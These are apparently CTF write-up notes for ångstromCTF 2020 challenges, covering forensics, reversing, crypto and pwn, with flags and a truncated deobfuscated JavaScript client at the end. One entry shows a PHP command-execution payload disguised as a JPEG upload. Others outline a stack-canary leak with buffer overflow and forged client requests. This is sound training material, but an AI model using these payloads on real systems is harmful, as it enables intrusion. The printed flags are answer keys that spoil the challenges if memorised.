1 of 28

Angstrom

Git Good

/.git/index
/./git/thisistheflag.txt
"The flag was here"

Clone git repo
Git clone https://gitgood.2020.chall.actf.co/.git/
Find the commit logs at /.git/logs/HEAD
Get the Sha-1 hash of the first log
Git checkout 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5
(Switches to that version of the repo)
Cat thisistheflag.txt
actf{b3_car3ful_wh4t_y0u_s3rve_wi7h}

Secret Agents

Add

bam ez flag

windows of opportunity

actf{ok4y_m4yb3_linux_is_s7ill_b3tt3r}

Califrobnication

./califrobnication > ~/file & echo $! | date on shell server

This will give you an exact timestamp and an approximate PID Next run following command locally, with a flag.txt file of length 49

date +%s -s @<UNIX TIMESTAMP HERE> ;sudo echo <PID-2 HERE> > /proc/sys/kernel/ns_last_pid; ./califrobnication | hd

You will get a number of different outputs Look for one that has the last letter of flag.txt xor'ed in the same place as the } xor'ed was on the shell Dexor Reassemble the flag GG;No re

actf{dream_of_califrobnication_1f6d458091cad25}

Patcherman

Look in hex - line 01050 - be ba 0d f0 That spelled backwards is f00dbabe Open cutter, go to graph, main 'cmp eax, 0x1337beef' Convert that to the format it needs

python -c "import pwn; print(pwn.p32(0x1337beef))"  | hd - ef be 37 13

Swap that with f00dbabe ./patcherman

actf{p4tch3rm4n_15_n0_m0r3}

Just Rust

Have a bit of an experiment The input is broken down into 4 chunks of 8 Imagine the output like a grid The first character is converted to binary and written to the grid like a diagonal line, with the lsb at the top. For the next character the line is shifted to the right one, and so on until all characters in the chunk have been written. This repeats for the next 3 chunks, except instead of 1, the numbers 2, 4 and 8 are written instead After the string is written 40 is added to all squares and it is converted to ascii. To solve, unconvert, subtract 40 and reverse the process gg, beat woak

actf{b1gg3r_4nd_b4dd3r_l4ngu4g3}

No canary

Use r2 to find address of flag function, 0x00401186 Find buffer length needed.

WS3

http.request.method == GET on wireshark
Export Objects > HTTP > git-receive-pack
Create a new git repo
Place in the git repo
Open in hex editor and fix the file header to be just 'PACK' at the beginning (remove all the crap)
Now git unpack-objects < git-receive-pack
Navigate to objects folder, here there are 3 git objects:
- a commit
- a tree file
- a blob file
Decompress the zlib blob file with: python -c "import zlib; print zlib.decompress(open('3f47cbcb3ad8e946d0aad59259bdb1bc9e63f2').read());" > flag.jpg
Open the file up in a hex editor and remove the first few bytes so the header is a jpeg header
Open it up for the flag
actf{git_good_git_wireshark-123323}

Confused Streaming

nc crypto.2020.chall.actf.co 20601
a: 1
b: 33
c: 7

Returns:

01100001011000110111010001100110011110110110010001101111011101110110111001011111011101000110111101011111011101000110100001100101010111110110010001100101011000110110100101101101011000010110110001111101

Converts to get:

actf{down_to_the_decimal}

Reasonably Secure Algorithm

With an n value this small, it can be quite easily cracked. I used RsaCtfTool (git clone ), with the command:

actf{10minutes}

Defund's Crypt

ÿØÿà JFIF  
<?php
system("cat /flag.txt");
?>

actf{th3_ch4ll3ng3_h4s_f4ll3n_but_th3_crypt_rem4ins}

Low-kee

All we had to find was a'/a and apply it on b'wb to get a'b'wba to get our solution but reversing it to achieve fewest moves. i did a'waw' to find the differences between the 2 scrambles. luckily only corners were affected so i can take less time. i then analysed the movement of corners swaps of w and represented them in Old Pochmann notation: ANTXPDGJ afterwards i mapped out the corner swaps of a'wa also represented in Old Pochmann notation: AMPHFNLO then i got a sheet of paper and mapped out a'wa corner pieces onto the corner swaps of w to find the setup move (a = B U B U D' F' L2 F U2 L2 U' L2 D F2 U2 F2 U' B2). After filling the cube corners out i plugged it into the rubiks cube solver to get a. i applied it onto b'wb and then plug it into the rubiks cube solver again and reverse the solution to get the flag.

Discrete Superlog

Found this repl.it on this stack overflow, adjusted to this and used x function to manually calculate values

Wacko Images

We have ab mod c = d where we know b (key), c (251), and d (encrypted pixel value). Multiplying by the modular inverse of b gets us: a mod c = d * b^-1 mod c

Calculate this for every pixel in the image with a script, and you get an image that contains the flag.

The flag is:

actf{m0dd1ing_sk1llz}

Shifter

actf{h0p3_y0u_us3d_th3_f0rmu14-1985098}

Xmas Still Stands

Report that, bam ez

Noisy

So i averaged the first 10 nums and gave it a number as well as add 0.5 (to reverse what the source did) this gave me binary and i replaced it with values from source. i shoved it into a morse code decoder to get a pattern and then brute forced the flag by guessing what the letters could be

Canary

Use pattern.py to flood the second input, put a breakpoint at the line in greet which compares the canaries. Check rax using gdb, feed that back into pattern.py, 56 bytes before canary. Fuzz format string output until you find the one that's always 8 bytes long, that's the canary Make a script that leaks the canary then overflows the buffer with 56 junk bytes + canary + 8 junk bytes + flag address

Note: canary is just before ebp, which is why you must put 8 junk bytes to fill up ebp

Inputter

Look at the source code, gives you the arguments that you need to put into the program, and what you must type in the buffer. They are unprintable characters, so use a python script to run it

actf{inhale_exhale_ezpz-12309biggyhaby}

clam clam clam

nc misc.2020.chall.actf.co 20204 | more

type "clamclam" for salvation

type "clamclam"

actf{cl4m_is_my_f4v0rite_ctfer_in_th3_w0rld}

PSK

Used DigiPan to decode the PSK31 signals

actf{hamhamhamhamham}

Taking Off

Found arguments were 3 numbers 0-9 and "chicken" Although not meant to I brute forced it with this python script:

import itertools
import os

nums = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
for c in itertools.product(nums, repeat=3):
    args = "(echo " + str(c[0]) + "; echo " + str(c[1]) + "; echo " + str(c[0]) + ") | ./taking_off"
    args = "./taking_off " + str(c[0]) + " " + str(c[1]) + " " + str(c[2]) + " chicken"
    print(args)
    os.system(args)

String "ZFOKYO\nMC\O\nLFKM" seen in memory About where the password is compared XOR it with the key 2a to get 'please give flag' with newlines removed.

Consolation

In console:

for(i=0; 1 < 9999; i++){nofret()}

Flag will appear in console

actf{you_would_n0t_beli3ve_your_eyes}

Signal_of_hope

Open program in cutter and disassemble main

call    signal     ; sym.imp.signal ; void signal(int sig, void *func)

Looking at "linux 7 signal" - we see a load, so I bruteforced them all until one worked - found it was SIGABRT This means that we need to kill the program , or abort it Spinning it up on the shell, we have to do

sh -c 'echo $$; exec myCommand'

Which gives up the PID of the program and then runs it Open up a new shell, and do "kill -6 PID" Bam!

actf{h0p3_c4nn0t_m3nd_th3_p41n_th4t_y0uv3_c4us3d_m3}

One Time Bad

Run the server script at same time as nc Use sample to make sure randomness is same On local pick option 2 and get wrong to receive answer ^C ^V into netcat gg

actf{one_time_pad_more_like_i_dont_like_crypto-1982309}

Revving up

Go to the place where the file is and run it, then it asks you to do it with banana as an argument, then do ./revving_up "banana" and do what it says

actf{g3tting_4_h4ng_0f_l1nux_4nd_b4sh}

import numpy as np
from random import gauss
import math

out2 = "100100101101000011011011000010100001010000001101011011000011010010010110110000101000010101000010111100001101000011011011000111100001010000101101010011000011010000110100110000100000010101000010101100001101000011011011000010100001010100000111011011001010010001110110110000101100110101000010101100001101000011011011000010100001010100001101011011000011010000110110110000100000010101000010101100000011100011111011000010000001010100001101011011000011010100110110110000101000010101010010111100001100000011011110000010100011010100001101011011001011110000010110110000101000010101000010101100011101000011011011000010100001010110001100011011000011010100111010110001101000010101000010101100001101000011011011000010100001010110001101011011000011010000110110111010101010010101000010101110001101000011010011000010100001010100001101011011000011010000110100110000101000010101000010101100001101000011011011000010100001010100001111011011100011010000101110110000101000010101000010101100001101000011011011000010100011010100101101011011000011110000110100010000111000010101000010101000001101010011011011000010100000010100000101011011000011010000110110110000101000010101000010101000001101000011011011000010100001010100001101011011000011010000110110110000101000010101000110101100001101010011011111000010100001010100001101011011000001110000110110110000101001010101001010101100001001001011011010000010100001010101001101011111000011010100010110110000101000010101000010101100001101000011011011001010000000010100001101011011000011010000110110110000101000010101000010101100001101100011011011010000110001010000001101011011000011010000110110110000101000010101001011101100001101000011011010000010100001010101001001011011000011011000110110010000101001010101000010101100001111000011011011000010110001010100101101011011000011010000110110111000101000010100000010101100001101010011011011000010100001010100001101011011000011011000110110110001101000011101001010101100001001000011011011000010100010010100001101011011000011010000110100100000101000010101000010111100001101000111011011000010100001010100001101011001000011010000110110110000101000110101000000101100001101010011011011001010101001010100001101111011000011010000110110110000101000010111000010101100001101000011011011000010100001010100011101011011000011010001110110100000101000010101000010101100001101000011011011000010100101010100001101011011000011010000110110110000101000000101000010101110001101000011011111000110100001010100001101011011000011010000110110110000001000011000000110101100000101000011011011000010100001010100000101011011000011010100110110110000101001010100001010101100001101000011011001000010101011010100001101011111000011010000110010110000101000010101000010100100001101000011011011001010100001010100001101011111000011010000110110100000101010000101000010101100001101000011111011000000110001011100001111011011000011010000011110110000101000010101000010"
out = []
out2 = ""
with open("flag.txt","r") as f:
    cont = f.read().split("\n")
    sums = 0

    for i,num in enumerate(cont):
        sums += float(num)
        sums += float(cont[i+14400])
        if (i + 1)%10 == 0:
            out.append(sums/20+0.5)
            sums = 0
        if i == 14399:
            break

for i in out:
    a = round(i)
    if a < 0:
        a = 0
    if a > 1:
        a = 1

    out2 = out2 + str(a)

print(out2)    

"""
10010-11012010000110110110000101000010100000011010110120000110100100101101100002010-10010101000010111100002102000011-111011000111100001010000101101020011000011010000210100110000100000010101000-110101100-102201000011011-111-1-100101000-110201000-101120120110010200100011101101100002011001101020000101011000-111010000120110210000101000010101000011010110110000110100001101101100001000000101-110000101011000000111000121110110000100000010101-10001101-111011000011-1101001101101100-101010-100101-1101001011120000110000-1-111011110000-11010001101010000110201102100101111000001011011000-1101000-11010100-1010101100012101-100011011012000020100001010110001100011011000011-11010-1111020110-10110100001010100001-1101100001101000011011011000010100001010110001102021011000-1110100-1011011011101010101001010100001010111-10-1210100001101001100001-110000101010000110101101100-1011010000110100110000101000010101-1000201011000011-11-1000110110110000101000010101000011110120121000110100-1010122011000-11010-10020101000-1101011000011-1100-1011011011000010100011010100101101011011000011110000110100020000111000010101000-1102010000011010100110110110000101000000101000001010110110-10011-11000011011011000010100001010100001010100-1001101000011011011000010100001-1101-1000110101101100001101000011021011-10-1010100001010100011-1101100001101010011011111-10-1010100001010100001101011-111000001120000110110110000101001010101001010101100002001001011021010000010100001010101001101011111000012010100010110110000101000010101-1000101012000011010-10-11101101100101000000001010000110102101100001101000011011011-100-110100002010100001010110000110110001101101101-1000110001010000-1011010110110000110100001201101100001010000101010010111011-10-10110100001101102000-1-110100001010101001001011-1110000110110001101100100001010010101010000101011000011110000110110120000101100020101001011010110110000110100001101101110002010000102-1000002010110000110101001101101100001010000101010000210101101100001202100011011011000110100001110200101010110000100100001101101100001-11000100101000012010110110000110100002101001000001010000101010000101111000011010001110110110-1001010000101010000110101100100001101-1000110110110000101-1001101-110-10000201100001101010011021-111001010101001010100001101111011000011-1100001101101100002010000101110000101011000011010000110110110000101-1000101010001120101101100001101-10011101101000-10101000010101000010101100001101-100011022011000010100101010100001101021021000011-11000011011011-100020100000-1101000010101110001101000-121011111000110100002010100001101011011000011010000110110110000001000011000000110101100000101000011011011-1000101000020101000-10101011011-1-100110101002101101100001010010201000010101-11100001101000011011001000010101011-11010000210101111100001101000011001011-1000101000010101000010100200001101000-121011011001010100001010100001101021111000-11101000011011010-10001010100001010-10010101100001101000011111011000000110-10101110-1-10111102102100001101000001111011000010100001010100001-1"""
print(len(out2))

out3 = out2
out4 = out3.replace("110","-")
out4 = out4.replace("000"," ")
out4 = out4.replace("10",".")
#out4 = out4.replace("00","")
out4 = out4.replace("0","")
out4 = out4.replace("1",".")
print("---------")
print(out4)
input()

Wooosh

Deobfuscate all the code and after finding this line

socket['emit']('click', coords[0x0], coords[0x1]);

This sends a post that'll send mouse coords. after i messed around a bit i realised that the shapes coords are different from the one they send to you so i guess something happens with them (not sure what tho). i then analysed the thingies going on in network which was always in the pattern start [get shapes, send coords, get score] and found the code to find mouse coords (see deobfuscated js) was consistent with where the shapes are displayed. after that i looked at the code that draws out the shapes with the coord and figured out how it knows whether to draw a circle or square. which was:

function drawShapes() {
    ctx["clearRect"](0x0, 0x0, 0x1f4, 0x12c);
    shapes['map'](
        (_0x401a13,_0x53031c)=>_0x53031c ? ctx["fillRect"](_0x401a13['x'] - 0x5, _0x401a13['y'] - 0x5, 0xa, 0xa) 
        : ctx['beginPath']() + ctx["arc"](_0x401a13['x'], _0x401a13['y'], 0x5, 0x0, Math['PI'] * 0x2) + ctx["closePath"]() + ctx["fill"]()
        );

If you know a little js, it chooses the first element of the shapes list to be a circle and the rest are squares. after that i checked whether the shapes list matches the shapes list going in through the network and found they were different. The shapes list was correct and matched the coords of the circle and after analysing a thingy that sends my mouse coords, they were roughly the same which meant i could create the payload

socket['emit']('click', shapes[0].x, shapes[0].y);

Spam it through console when i press start which gave me points :) and then i got the flag (turns out i didnt need the backend source code lol)

actf{w0000sh_1s_th3_s0und_0f_th3_r3qu3st_fly1ng_p4st_th3_fr0nt3nd}

var _0x1ce0 = ['bWFw', 'SlBOcFY=', 'a1dQd2M=', 'Z2V0Q29udGV4dA==', 'SkxnSXA=', 'Y2xvc2VQYXRo', 'Y0dhbWU=', 'Y291bnRlcg==', 'Z2V0Qm91bmRpbmdDbGllbnRSZWN0', 'c3RhdGVPYmplY3Q=', 'QmZDSk0=', 'WVlOdEU=', 'ZmlsbA==', 'TWZhRHU=', 'c3BsaXQ=', 'TnNndkw=', 'd2Fybg==', 'ck9ZWHg=', 'UnNGSFI=', 'b3dsQnU=', 'RkRCaGY=', 'eERtaWc=', 'cVZyYms=', 'dEtxZXQ=', 'YllhZFQ=', 'UVJWcVA=', 'eFJkWUM=', 'QUdRZnU=', 'UUR3cHc=', 'Tk9Cam4=', 'bUJ2QU8=', 'Z2V0RWxlbWVudEJ5SWQ=', 'Y2xpZW50WA==', 'bGVuZ3Ro', 'ZXhjZXB0aW9u', 'TmhncEI=', 'Q1VnV20=', 'QlFQYVI=', 'YWRkRXZlbnRMaXN0ZW5lcg==', 'Y29uc3RydWN0b3I=', 'YmVnaW5QYXRo', 'YUpBbHU=', 'aW5pdA==', 'Y1h0TGY=', 'cHh0Q2Y=', 'XCtcKyAqKD86W2EtekEtWl8kXVswLTlhLXpBLVpfJF0qKQ==', 'ZXd3YUE=', 'ZGlzY29ubmVjdA==', 'SUp4T0w=', 'QmlRb1Y=', 'cmV0dXJuIC8iICsgdGhpcyArICIv', 'S09Bd1E=', 'V0ZtVHQ=', 'bmF0Qm8=', 'dlFSdEU=', 'I2ZmMDAwMA==', 'Y29uc29sZQ==', 'VEJXUWk=', 'SGl0bEI=', 'ZW95Y1g=', 'YWF0U24=', 'UU5Pc3I=', 'a2ZPREk=', 'UkhqWGU=', 'ZGVidWc=', 'QlZnUEI=', 'bENjSEo=', 'cFhQRkw=', 'bnBLSEU=', 'ZXJyb3I=', 'e30uY29uc3RydWN0b3IoInJldHVybiB0aGlzIikoICk=', 'Y2FsbA==', 'T2ROVEE=', 'dG9w', 'b2Jlemg=', 'U1dvS0Y=', 'c2hhcGVz', 'eXRJbkE=', 'Y3NheFE=', 'ZnVuY3Rpb24gKlwoICpcKQ==', 'bG9n', 'V3ZJQ3o=', 'anhGSm8=', 'YXhFRW8=', 'cGVKYlY=', 'WFZRU1A=', 'REdEcUU=', 'dGFibGU=', 'bnlmTlc=', 'dkJmanI=', 'd3lJVVA=', 'Y2xpY2s=', 'UXJYaGo=', 'ZFVoano=', 'cmV0dXJuIChmdW5jdGlvbigpIA==', 'XihbXiBdKyggK1teIF0rKSspK1teIF19', 'QURlbWk=', 'VEpEWmk=', 'VWRBTFo=', 'WWpXaXI=', 'elFyalM=', 'Mnw1fDl8OHwxfDZ8N3wwfDR8Mw==', 'aW5wdXQ=', 'd2hpbGUgKHRydWUpIHt9', 'QWZBT1M=', 'WmZNeFc=', 'dHJhY2U=', 'RVBublU=', 'Z2dlcg==', 'UEtrQmg=', 'Y2xlYXJSZWN0', 'YXJj', 'dGVzdA==', 'c2NvcmU=', 'bktJanY=', 'Y2hhaW4=', 'Q2Z1V0o=', 'U2NvcmU6IA==', 'SlV0dVY=', 'ZmlsbFN0eWxl', 'YlN0YXJ0', 'aW5GREs=', 'SERnSEY=', 'VlN0TG8=', 'ZmlsbFJlY3Q=', 'WHhaaXc=', 'c3RhcnQ=', 'YXBwbHk=', 'NHwxfDV8N3w2fDN8Mnww', 'ZGVidQ==', 'ZW1pdA==', 'RUpoc08=', 'enFVUWo=', 'ZldOVGs=', 'V0ZibmY=', 'aW5mbw=='];
(function(_0x20cc64, _0x1ce09b) {//cookie stuff 
    var _0x34d7a6 = function(_0x45c586) {
        while (--_0x45c586) {
            _0x20cc64['push'](_0x20cc64['shift']());
        }
    };
    var _0x59c786 = function() {
        var _0x2ee600 = {
            'data': {
                'key': 'cookie',
                'value': 'timeout'
            },
            'setCookie': function(_0x1baf97, _0x584a1c, _0x27dfce, _0x2f47ff) {
                _0x2f47ff = _0x2f47ff || {};
                var _0x3cdb63 = _0x584a1c + '=' + _0x27dfce;
                var _0x3ab829 = 0x0;
                for (var _0x30b65a = 0x0, _0x2024f0 = _0x1baf97['length']; _0x30b65a < _0x2024f0; _0x30b65a++) {
                    var _0x1e37b5 = _0x1baf97[_0x30b65a];
                    _0x3cdb63 += ';\x20' + _0x1e37b5;
                    var _0x1dca17 = _0x1baf97[_0x1e37b5];
                    _0x1baf97['push'](_0x1dca17);
                    _0x2024f0 = _0x1baf97['length'];
                    if (_0x1dca17 !== !![]) {
                        _0x3cdb63 += '=' + _0x1dca17;
                    }
                }
                _0x2f47ff['cookie'] = _0x3cdb63;
            },
            'removeCookie': function() {
                return 'dev';
            },
            'getCookie': function(_0x3962bf, _0x49db25) {
                _0x3962bf = _0x3962bf || function(_0x506876) {
                    return _0x506876;
                }
                ;
                var _0x3b872e = _0x3962bf(new RegExp('(?:^|;\x20)' + _0x49db25['replace'](/([.$?*|{}()[]\/+^])/g, '$1') + '=([^;]*)'));
                var _0x21d4b7 = function(_0xaa6690, _0x5f084e) {
                    _0xaa6690(++_0x5f084e);
                };
                _0x21d4b7(_0x34d7a6, _0x1ce09b);
                return _0x3b872e ? decodeURIComponent(_0x3b872e[0x1]) : undefined;
            }
        };
        var _0x37cabe = function() {
            var _0x27a400 = new RegExp('\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}');
            return _0x27a400['test'](_0x2ee600['removeCookie']['toString']());
        };
        _0x2ee600['updateCookie'] = _0x37cabe;
        var _0xc4302b = '';
        var _0x2d1069 = _0x2ee600['updateCookie']();
        if (!_0x2d1069) {
            _0x2ee600['setCookie'](['*'], 'counter', 0x1);
        } else if (_0x2d1069) {
            _0xc4302b = _0x2ee600['getCookie'](null, 'counter');
        } else {
            _0x2ee600['removeCookie']();
        }
    };
    _0x59c786();
}(_0x1ce0, 0xed));
var _0x34d7 = function(_0x20cc64, _0x1ce09b) {
    _0x20cc64 = _0x20cc64 - 0x0;
    var _0x34d7a6 = _0x1ce0[_0x20cc64];
    if (_0x34d7['ptmszC'] === undefined) {//ignore this below, values are decoded b64 from _0x1ce0. if statement checks if the values have been decoded already
        (function() {
            var _0x45c586 = function() {
                var _0xc4302b;
                try {
                    _0xc4302b = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');')();
                } catch (_0x2d1069) {
                    _0xc4302b = window;
                }
                return _0xc4302b;
            };
            var _0x2ee600 = _0x45c586();
            var _0x37cabe = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
            _0x2ee600['atob'] || (_0x2ee600['atob'] = function(_0x1baf97) {
                var _0x584a1c = String(_0x1baf97)['replace'](/=+$/, '');
                var _0x27dfce = '';
                for (var _0x2f47ff = 0x0, _0x3cdb63, _0x3ab829, _0x30b65a = 0x0; _0x3ab829 = _0x584a1c['charAt'](_0x30b65a++); ~_0x3ab829 && (_0x3cdb63 = _0x2f47ff % 0x4 ? _0x3cdb63 * 0x40 + _0x3ab829 : _0x3ab829,
                _0x2f47ff++ % 0x4) ? _0x27dfce += String['fromCharCode'](0xff & _0x3cdb63 >> (-0x2 * _0x2f47ff & 0x6)) : 0x0) {
                    _0x3ab829 = _0x37cabe['indexOf'](_0x3ab829);
                }
                return _0x27dfce;
            }
            );
        }());
        _0x34d7['pwjwqN'] = function(_0x2024f0) {
            var _0x1e37b5 = atob(_0x2024f0);
            var _0x1dca17 = [];
            for (var _0x3962bf = 0x0, _0x49db25 = _0x1e37b5['length']; _0x3962bf < _0x49db25; _0x3962bf++) {
                _0x1dca17 += '%' + ('00' + _0x1e37b5['charCodeAt'](_0x3962bf)['toString'](0x10))['slice'](-0x2);
            }
            return decodeURIComponent(_0x1dca17);
        }
        ;
        _0x34d7['psiqcL'] = {};
        true = !![];
    }
    var _0x59c786 = _0x34d7['psiqcL'][_0x20cc64];
    if (_0x59c786 === undefined) {
        var _0x3b872e = function(_0x21d4b7) {
            this['FnKpUT'] = _0x21d4b7;
            this['dnpwlO'] = [0x1, 0x0, 0x0];
            this['xxqOHK'] = function() {
                return 'newState';
            }
            ;
            this['UFWVYh'] = '\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*';
            this['okSRxK'] = '[\x27|\x22].+[\x27|\x22];?\x20*}';
        };
        _0x3b872e['prototype']['zRoycw'] = function() {
            var _0x506876 = new RegExp(this['UFWVYh'] + this['okSRxK']);
            var _0xaa6690 = _0x506876['test'](this['xxqOHK']['toString']()) ? --this['dnpwlO'][0x1] : --this['dnpwlO'][0x0];
            return this['wWoyOu'](_0xaa6690);
        }
        ;
        _0x3b872e['prototype']['wWoyOu'] = function(_0x5f084e) {
            if (!Boolean(~_0x5f084e)) {
                return _0x5f084e;
            }
            return this['Mmnboh'](this['FnKpUT']);
        }
        ;
        _0x3b872e['prototype']['Mmnboh'] = function(_0x27a400) {
            for (var _0x4f73b9 = 0x0, _0x317d20 = this['dnpwlO']['length']; _0x4f73b9 < _0x317d20; _0x4f73b9++) {
                this['dnpwlO']['push'](Math['round'](Math['random']()));
                _0x317d20 = this['dnpwlO']['length'];
            }
            return _0x27a400(this['dnpwlO'][0x0]);
        }
        ;
        new _0x3b872e(_0x34d7)['zRoycw']();
        _0x34d7a6 = _0x34d7['pwjwqN'](_0x34d7a6);
        _0x34d7['psiqcL'][_0x20cc64] = _0x34d7a6;
    } else {
        _0x34d7a6 = _0x59c786;
    }
    return _0x34d7a6;
};
var _0x2f47ff = function() {
    var _0x34a890 = {
        'xDmig': function(_0x1acd1d, _0x50045b) {
            return _0x1acd1d === _0x50045b;
        },
        'FDBhf': "npKHE",
        'AWOLM': "while (true) {}",
        'RZUwZ': "counter",
        'eoycX': "QNOsr",
        'cXtLf': 'BuBbm'
    };
    var _0x418c8e = !![];
    return function(_0x28cb74, _0x39da2d) {
        var _0x22e999 = {
            'EPnnU': "while (true) {}",
            'ZfMxW': "counter"
        };
        if (false) {
            if (_0x39da2d) {
                var _0xdc044d = _0x39da2d["apply"](_0x28cb74, arguments);
                _0x39da2d = null;
                return _0xdc044d;
            }
        } else {
            var _0x32fd69 = _0x418c8e ? function() {
                if (true) {//this bit is the only part that runs
                    if (_0x39da2d) { //true
                        var _0x4f6b34 = _0x39da2d["apply"](_0x28cb74, arguments);
                        _0x39da2d = null;
                        return _0x4f6b34;
                    }
                } else { //never executes
                    return function(_0x18294d) {}
                    ["constructor"]("while (true) {}")["apply"]("counter");
                }
            }
            : function() {} //this never runs
            ;
            _0x418c8e = ![];
            return _0x32fd69;
        }
    }
    ;
}();
var _0x27dfce = _0x2f47ff(this, function() {
    var _0x4d850d = {
        'DGDqE': function(_0x3dac4c, _0xd908d4) {
            return _0x3dac4c === _0xd908d4;
        },
        'QRVqP': "JLgIp",
        'MfaDu': "return /" + this + "/",
        'axEEo': "^([^ ]+( +[^ ]+)+)+[^ ]}"
    };
    var _0x4104ec = function() {
        if (true) {
            var _0x1baf6d = _0x4104ec['constructor']("return /" + this + "/")()['compile']("^([^ ]+( +[^ ]+)+)+[^ ]}");
            return !_0x1baf6d["test"](_0x27dfce);
        } else { //never executes
            that['console'] = function(_0x54cc65) {
                var _0x521582 = {};
                _0x521582["log"] = _0x54cc65;
                _0x521582["warn"] = _0x54cc65;
                _0x521582["debug"] = _0x54cc65;
                _0x521582["info"] = _0x54cc65;
                _0x521582["error"] = _0x54cc65;
                _0x521582["exception"] = _0x54cc65;
                _0x521582["table"] = _0x54cc65;
                _0x521582['trace'] = _0x54cc65;
                return _0x521582;
            }(func);
        }
    };
    return _0x4104ec();
});
_0x27dfce();
var _0x1baf97 = function() {
    var _0x4a04d8 = {
        'QDwpw': function(_0x580bda, _0xde7f8) {
            return _0x580bda === _0xde7f8;
        },
        'OdNTA': "kWPwc",
        'wuTZe': "XxZiw",
        'tKqet': 'ebwEc'
    };
    var _0x2e098e = !![];
    return function(_0x144f1d, _0x210b4a) {
        var _0x431a70 = {
            'mBvAO': function(_0x4bfe9c, _0x32222e) {
                return _0x4bfe9c === _0x32222e;
            },
            'UdALZ': "kWPwc",
            'nyfNW': "XxZiw",
            'acHtD': 'ebwEc'
        };
        var _0x388e28 = _0x2e098e ? function() {
            if (false) {
                msg = m;
                update();
            } else {
                if (_0x210b4a) {
                    if (false) {
                        var _0x37f6ab = _0x210b4a['apply'](_0x144f1d, arguments);
                        _0x210b4a = null;
                        return _0x37f6ab;
                    } else { //does same thing
                        var _0x4b2e75 = _0x210b4a["apply"](_0x144f1d, arguments);
                        _0x210b4a = null;
                        return _0x4b2e75;
                    }
                }
            }
        }
        : function() {}
        ;
        _0x2e098e = ![];
        return _0x388e28;
    }
    ;
}();
(function() {
    var _0x32f2b7 = {
        'natBo': "function *\( *\)",
        'SWoKF': '\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)',
        'TJDZi': function(_0x383e42, _0x247ec9) {
            return _0x383e42 + _0x247ec9;
        },
        'ytInA': function(_0x11e1a6, _0x3012cc) {
            return _0x11e1a6 + _0x3012cc;
        },
        'ADemi': "input",
        'rOYXx': "fWNTk",
        'GhaAN': function(_0x4d7529, _0x4cb76f) {
            return _0x4d7529(_0x4cb76f);
        },
        'SGiMY': "init",
        'aatSn': function(_0x4b2ee6, _0x4523dd) {
            return _0x4b2ee6 + _0x4523dd;
        },
        'jxFJo': "chain",
        'RsFHR': function(_0x5a9552, _0x34a4f2) {
            return _0x5a9552 + _0x34a4f2;
        },
        'zQrjS': function(_0x533fe7) {
            return _0x533fe7();
        }
    };
    _0x1baf97(this, function() {
        var _0x459fa1 = { //creates copy
            'xgOqS': "function *\( *\)",
            'YjWir': '\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)',
            'SvEXK': function(_0x5b2268, _0x20ad34) {
                return _0x5b2268(_0x20ad34);
            },
            'qVrbk': function(_0x4d1237, _0x4cd30e) {
                return _0x4d1237 + _0x4cd30e;
            },
            'IJxOL': "chain",
            'HitlB': function(_0x16d47a, _0x19706a) {
                return _0x16d47a + _0x19706a;
            },
            'WFmTt': "input",
            'zqUQj': function(_0x45146b, _0x15a3ad) {
                return _0x45146b(_0x15a3ad);
            },
            'JUtuV': function(_0x90fc88, _0x1f2352, _0x330dd0) {
                return _0x90fc88(_0x1f2352, _0x330dd0);
            }
        };
        if (true) { //actual code starts
            var _0x3db3a5 = new RegExp("function *\( *\)");
            var _0x4a74b1 = new RegExp('\+\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)','i');
            var _0x516a0a = _0x2d1069("init"); //cookie stuff
            if (!_0x3db3a5['test'](_0x516a0a + "chain") || !_0x4a74b1["test"](_0x516a0a + "input")) {
                _0x516a0a('0');
            } else {
                _0x2d1069;
            }
        } else { //ignore this
            _0x459fa1["JUtuV"](_0x1baf97, this, function() {
                var _0x14a11a = new RegExp(_0x459fa1['xgOqS']);
                var _0x5167c5 = new RegExp(_0x459fa1["YjWir"],'i');
                var _0x35294f = _0x459fa1['SvEXK'](_0x2d1069, "init");
                if (!_0x14a11a["test"](_0x459fa1["qVrbk"](_0x35294f, _0x459fa1["IJxOL"])) || !_0x5167c5['test'](_0x459fa1["HitlB"](_0x35294f, _0x459fa1["WFmTt"]))) {
                    _0x459fa1["zqUQj"](_0x35294f, '0');
                } else {
                    _0x2d1069();
                }
            })();
        }
    })();
}());
var _0x2ee600 = function() {
    var _0x495ac2 = {
        'atoNo': 'KOAwQ',
        'csaxQ': 'lCcHJ'
    };
    var _0x349c1f = !![];
    return function(_0x433e6d, _0x5e0022) {
        var _0x48c3bc = _0x349c1f ? function() {
            if (false) {//ignore
                if (_0x5e0022) {
                    var _0x161cc2 = _0x5e0022['apply'](_0x433e6d, arguments);
                    _0x5e0022 = null;
                    return _0x161cc2;
                }
            } else {//basically do same things
                if (_0x5e0022) {
                    var _0x60f4d3 = _0x5e0022["apply"](_0x433e6d, arguments);
                    _0x5e0022 = null;
                    return _0x60f4d3;
                }
            }
        }
        : function() {}
        ;
        _0x349c1f = ![];
        return _0x48c3bc;
    }
    ;
}();
var _0x45c586 = _0x2ee600(this, function() {
    var _0x173ec1 = {
        'YYNtE': function(_0x31edf7, _0x1a2a90) {
            return _0x31edf7 + _0x1a2a90;
        },
        'TBWQi': function(_0x50c5e2, _0x145a68) {
            return _0x50c5e2 + _0x145a68;
        },
        'AGQfu': '2|5|9|8|1|6|7|0|4|3',
        'NOBjn': "return /" + this + "/",
        'WFbnf': "^([^ ]+( +[^ ]+)+)+[^ ]}",
        'xRdYC': function(_0x28078a) {
            return _0x28078a();
        },
        'bYadT': function(_0x1edb6d, _0x41b276) {
            return _0x1edb6d === _0x41b276;
        },
        'inFDK': 'wPbVg',
        'peJbV': '4|1|5|7|6|3|2|0'
    };
    var _0x5a2bbc = function() {};
    var _0x16f724 = function() {
        var _0x47e403;
        try {
            _0x47e403 = Function('return (function() {}.constructor("return this")( ));')();
        } catch (_0x3b48f1) {
            _0x47e403 = window;
        }
        return _0x47e403;
    };
